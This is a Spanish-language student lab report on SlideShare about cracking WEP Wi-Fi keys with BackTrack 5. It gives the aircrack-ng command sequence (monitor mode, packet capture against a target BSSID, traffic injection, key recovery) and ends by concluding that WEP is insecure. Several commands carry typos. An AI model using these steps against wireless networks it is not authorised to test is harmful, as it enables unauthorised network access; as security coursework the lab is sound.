SlideShare una empresa de Scribd logo
1 de 11
SEGURIDAD EN WI-FI CON PROTOCOLOS WEP




OBJETIVO:

Desarrollar habilidades y conocimientos con respecto a la forma de vulnerar el
servicio de seguridad WEP en redes inalámbricas tipo Wi-Fi.


MATERIAL A UTILIZAR:


      CD Backtrack 5 descargables de: http://www.backtrack-
      linux.org/downloads/
      Sistema operativo Linux.


TOPOLOGÍA A UTILIZAR:
PROCEDIMIENTOS PARA ACCEDER A UNA RED

Paso # 1: ingresar Backtrack5-ubuntu

Paso # 2: al ingresar al Backtrack5, nos pide login: root y password: toor
cuando arranque la interfaz ponemos la siguiente línea:



#aeromon-ng (este identifica que tarjeta de red se tiene en el equipo) después
#airodump-ng wlan0 (esta escanea las redes que hay alrededor, wlan0 tarjeta
de red de nuestro equipo).




#Iwconfig wlan0 (muestra los datos de la tarjeta).



# sudo ifconfig wlan0 down (este bajo los servicios de la tarjeta de red)

# sudo Iwconfig wlan0 mode monitor (ponerlo en modo monitor)

# sudo ifconfig wlan0 up (este nos sube los servicios del a tarjeta)

# sudo Iwconfig wlan0
Volvemos al paso a escribir airodump-ng wlan0 para escanear las
redes que hay al nuestro alrededor, en este paso escogemos la red
que vamos a craquear (como muestra la figura a continuación.)

Debemos tener en cuenta los números de:

     BSSID
     CANAL
     ESSID - CLIENTE
#airondump-ng –w otro –c 1 –bssid 20:CF:30:37:9F:A8 wlan0

Estas especificaciones son la de la red que vamos a atacar, es
necesario escribir el bssid en mayúscula.

     Otro (nombre de la carpeta donde va capturando los archivos)
     -c (canal de la red).


      BSSID                 CANAL                  ESSID

 20:CF:30:37:9F:A8           CH 1                45159902



NOTA: en este paso esperamos a que mínimo tenga 30.OOO
paquetes, debajo del DATA.
Ahora abrimos otra consola:



#aireplay-ng -1 0 –a 20:CF:30:37:9F:A8 wlan0

(Trabajamos mientras van cargando los archivos)
Abrimos otra consola



# aireplay-ng -3 -b 20:CF:30:37:9F:A8 wlan0


(Este inyecta el tráfico. Este paso no funciona bien en todos los dispositivos
wifi, dependiendo de los drivers y núcleo de nuestro equipo. Esto nos permitirá
acelerar notablemente el proceso de captura de paquetes).
NOTA: las claves salen en hexadecimal y ASCII



En esta misma consola escribimos



#dir otro.cap (este es el archivo de nosotros con extensión .cap)
nos saldrá la siguiente pagina.



#aircrack-ng otro.cap key found         (esta es la clave del
enrutamiento)
CLAVE: BEBDFF5052B42




Esta es la clave: BEBDFF5052B42 es la de la red que atacamos
45159902, a continuación comprobamos que si es la clave correcta.
CONCLUSION



Con en el laboratorio hemos concluido que la seguridad en las redes inalámbricas es
imprescindible siempre tener la en cuenta, ya que hay muchas transmisiones que no
son seguras, es casi que obligatorio asegúralas para la confiabilidad de los datos
como la integridad y autenticidad de estos mismos. Apresar que WEP está incluido en
la norma de la IEEE no proporciona seguridad total. Uno de los problemas más
latentes en la utilización de vectores al iniciarlo, ya que no tiene cifrado de mensajes
(clave secreta).

El protocolo WEP no debe ser la única herramienta o política para asegura datos o
contraseñas se debe de implementar otras alternativas y mantener controles para la
confiabilidad e integridad de datos y demás.

Más contenido relacionado

La actualidad más candente

La actualidad más candente (17)

MANEJO DE REDES.PRAC.5
MANEJO DE REDES.PRAC.5MANEJO DE REDES.PRAC.5
MANEJO DE REDES.PRAC.5
 
practica 15 irdt
practica 15 irdtpractica 15 irdt
practica 15 irdt
 
Inseguridad Redes Inalambricas
Inseguridad Redes InalambricasInseguridad Redes Inalambricas
Inseguridad Redes Inalambricas
 
Cisco 1 ejercicio
Cisco 1 ejercicioCisco 1 ejercicio
Cisco 1 ejercicio
 
Tmg
TmgTmg
Tmg
 
WEP and WPA exposed
WEP and WPA exposedWEP and WPA exposed
WEP and WPA exposed
 
Contenidos del VídeoBook de "Pentesting con Kali 2020"
Contenidos del VídeoBook de "Pentesting con Kali 2020"Contenidos del VídeoBook de "Pentesting con Kali 2020"
Contenidos del VídeoBook de "Pentesting con Kali 2020"
 
Practica 15 irdt
Practica 15 irdtPractica 15 irdt
Practica 15 irdt
 
Inserguridad en WIFI
Inserguridad en WIFIInserguridad en WIFI
Inserguridad en WIFI
 
Wifi oskar
Wifi oskarWifi oskar
Wifi oskar
 
Microsoft forefront (TMG)
Microsoft forefront (TMG)Microsoft forefront (TMG)
Microsoft forefront (TMG)
 
Firewalls iptables
Firewalls iptablesFirewalls iptables
Firewalls iptables
 
Endian firewall
Endian firewallEndian firewall
Endian firewall
 
Manual Endian
Manual EndianManual Endian
Manual Endian
 
Curso de GNS3 - Presentación
Curso de GNS3 - PresentaciónCurso de GNS3 - Presentación
Curso de GNS3 - Presentación
 
Forefront threat management gateway (tmg) 2010
Forefront threat management gateway (tmg) 2010Forefront threat management gateway (tmg) 2010
Forefront threat management gateway (tmg) 2010
 
Firewall
FirewallFirewall
Firewall
 

Similar a Backtrack 5

Testing Redes Inalambricas wifiway (Definiciones))
Testing Redes Inalambricas wifiway (Definiciones))Testing Redes Inalambricas wifiway (Definiciones))
Testing Redes Inalambricas wifiway (Definiciones))begolnx
 
Aircrack ng: comandos básicos
Aircrack ng: comandos básicosAircrack ng: comandos básicos
Aircrack ng: comandos básicosJIvanC
 
Marco teórico descifrado de redes
Marco teórico   descifrado de redesMarco teórico   descifrado de redes
Marco teórico descifrado de redesSwanny Aquino
 
Auditoría wireless
Auditoría wirelessAuditoría wireless
Auditoría wirelessruben0909
 
Hack like a Pro with a custom gadgets - Taller BitUp 2018
Hack like a Pro with a custom gadgets - Taller BitUp 2018Hack like a Pro with a custom gadgets - Taller BitUp 2018
Hack like a Pro with a custom gadgets - Taller BitUp 2018Javier García Antón
 
Cracking wep con kali linux
Cracking wep con kali linuxCracking wep con kali linux
Cracking wep con kali linuxNick Carter
 
Funcionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislaxFuncionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislaxWaldir Nuñez Francia
 
Proyecto 6
Proyecto 6Proyecto 6
Proyecto 6davister
 
Laura patricia-flores-dominguez
Laura patricia-flores-dominguezLaura patricia-flores-dominguez
Laura patricia-flores-dominguezlaura flures
 

Similar a Backtrack 5 (20)

Testing Redes Inalambricas wifiway (Definiciones))
Testing Redes Inalambricas wifiway (Definiciones))Testing Redes Inalambricas wifiway (Definiciones))
Testing Redes Inalambricas wifiway (Definiciones))
 
Aircrack ng: comandos básicos
Aircrack ng: comandos básicosAircrack ng: comandos básicos
Aircrack ng: comandos básicos
 
Curso de wifi y redes locales
Curso de wifi y redes localesCurso de wifi y redes locales
Curso de wifi y redes locales
 
Backtrack 3 manual
Backtrack 3 manualBacktrack 3 manual
Backtrack 3 manual
 
Crack redes wifi
Crack redes wifiCrack redes wifi
Crack redes wifi
 
Crackeando redes wep
Crackeando redes wepCrackeando redes wep
Crackeando redes wep
 
Juan
JuanJuan
Juan
 
Marco teórico descifrado de redes
Marco teórico   descifrado de redesMarco teórico   descifrado de redes
Marco teórico descifrado de redes
 
Auditoría wireless
Auditoría wirelessAuditoría wireless
Auditoría wireless
 
Hack like a Pro with a custom gadgets - Taller BitUp 2018
Hack like a Pro with a custom gadgets - Taller BitUp 2018Hack like a Pro with a custom gadgets - Taller BitUp 2018
Hack like a Pro with a custom gadgets - Taller BitUp 2018
 
Cracking wep con kali linux
Cracking wep con kali linuxCracking wep con kali linux
Cracking wep con kali linux
 
Propietario
PropietarioPropietario
Propietario
 
Manual red inlambrica
Manual red inlambricaManual red inlambrica
Manual red inlambrica
 
Redeswifi i
Redeswifi iRedeswifi i
Redeswifi i
 
WEP
WEPWEP
WEP
 
Backtrack 3
Backtrack 3Backtrack 3
Backtrack 3
 
Funcionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislaxFuncionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislax
 
Proyecto 6
Proyecto 6Proyecto 6
Proyecto 6
 
ALGORITMOS
ALGORITMOSALGORITMOS
ALGORITMOS
 
Laura patricia-flores-dominguez
Laura patricia-flores-dominguezLaura patricia-flores-dominguez
Laura patricia-flores-dominguez
 

Más de Jeison Candamil (18)

ECCI
ECCIECCI
ECCI
 
ECCI
ECCIECCI
ECCI
 
Proteccion de software
Proteccion de softwareProteccion de software
Proteccion de software
 
Estadistica (1)
Estadistica (1)Estadistica (1)
Estadistica (1)
 
Introducción a spss
Introducción a spssIntroducción a spss
Introducción a spss
 
Rae hacking
Rae hackingRae hacking
Rae hacking
 
Rae
RaeRae
Rae
 
Auditoria sistema computacional
Auditoria sistema computacionalAuditoria sistema computacional
Auditoria sistema computacional
 
Rae2
Rae2Rae2
Rae2
 
Rae2.1
Rae2.1Rae2.1
Rae2.1
 
Backtrack 5
Backtrack 5Backtrack 5
Backtrack 5
 
Rae introducción a backtrack 5
Rae introducción a backtrack 5Rae introducción a backtrack 5
Rae introducción a backtrack 5
 
Rae linux
Rae linuxRae linux
Rae linux
 
Rae introducción a backtrack 5
Rae introducción a backtrack 5Rae introducción a backtrack 5
Rae introducción a backtrack 5
 
Rae linux2
Rae linux2Rae linux2
Rae linux2
 
Antenas
AntenasAntenas
Antenas
 
Diseño de red hfc en la ciudad de bogota
Diseño de red hfc en la ciudad de bogotaDiseño de red hfc en la ciudad de bogota
Diseño de red hfc en la ciudad de bogota
 
Diseño de red hfc en la ciudad de bogota
Diseño de red hfc en la  ciudad de bogotaDiseño de red hfc en la  ciudad de bogota
Diseño de red hfc en la ciudad de bogota
 

Backtrack 5

  • 1. SEGURIDAD EN WI-FI CON PROTOCOLOS WEP OBJETIVO: Desarrollar habilidades y conocimientos con respecto a la forma de vulnerar el servicio de seguridad WEP en redes inalámbricas tipo Wi-Fi. MATERIAL A UTILIZAR: CD Backtrack 5 descargables de: http://www.backtrack- linux.org/downloads/ Sistema operativo Linux. TOPOLOGÍA A UTILIZAR:
  • 2. PROCEDIMIENTOS PARA ACCEDER A UNA RED Paso # 1: ingresar Backtrack5-ubuntu Paso # 2: al ingresar al Backtrack5, nos pide login: root y password: toor cuando arranque la interfaz ponemos la siguiente línea: #aeromon-ng (este identifica que tarjeta de red se tiene en el equipo) después
  • 3. #airodump-ng wlan0 (esta escanea las redes que hay alrededor, wlan0 tarjeta de red de nuestro equipo). #Iwconfig wlan0 (muestra los datos de la tarjeta). # sudo ifconfig wlan0 down (este bajo los servicios de la tarjeta de red) # sudo Iwconfig wlan0 mode monitor (ponerlo en modo monitor) # sudo ifconfig wlan0 up (este nos sube los servicios del a tarjeta) # sudo Iwconfig wlan0
  • 4. Volvemos al paso a escribir airodump-ng wlan0 para escanear las redes que hay al nuestro alrededor, en este paso escogemos la red que vamos a craquear (como muestra la figura a continuación.) Debemos tener en cuenta los números de: BSSID CANAL ESSID - CLIENTE
  • 5. #airondump-ng –w otro –c 1 –bssid 20:CF:30:37:9F:A8 wlan0 Estas especificaciones son la de la red que vamos a atacar, es necesario escribir el bssid en mayúscula. Otro (nombre de la carpeta donde va capturando los archivos) -c (canal de la red). BSSID CANAL ESSID 20:CF:30:37:9F:A8 CH 1 45159902 NOTA: en este paso esperamos a que mínimo tenga 30.OOO paquetes, debajo del DATA.
  • 6. Ahora abrimos otra consola: #aireplay-ng -1 0 –a 20:CF:30:37:9F:A8 wlan0 (Trabajamos mientras van cargando los archivos)
  • 7. Abrimos otra consola # aireplay-ng -3 -b 20:CF:30:37:9F:A8 wlan0 (Este inyecta el tráfico. Este paso no funciona bien en todos los dispositivos wifi, dependiendo de los drivers y núcleo de nuestro equipo. Esto nos permitirá acelerar notablemente el proceso de captura de paquetes).
  • 8. NOTA: las claves salen en hexadecimal y ASCII En esta misma consola escribimos #dir otro.cap (este es el archivo de nosotros con extensión .cap) nos saldrá la siguiente pagina. #aircrack-ng otro.cap key found (esta es la clave del enrutamiento)
  • 9. CLAVE: BEBDFF5052B42 Esta es la clave: BEBDFF5052B42 es la de la red que atacamos 45159902, a continuación comprobamos que si es la clave correcta.
  • 10.
  • 11. CONCLUSION Con en el laboratorio hemos concluido que la seguridad en las redes inalámbricas es imprescindible siempre tener la en cuenta, ya que hay muchas transmisiones que no son seguras, es casi que obligatorio asegúralas para la confiabilidad de los datos como la integridad y autenticidad de estos mismos. Apresar que WEP está incluido en la norma de la IEEE no proporciona seguridad total. Uno de los problemas más latentes en la utilización de vectores al iniciarlo, ya que no tiene cifrado de mensajes (clave secreta). El protocolo WEP no debe ser la única herramienta o política para asegura datos o contraseñas se debe de implementar otras alternativas y mantener controles para la confiabilidad e integridad de datos y demás.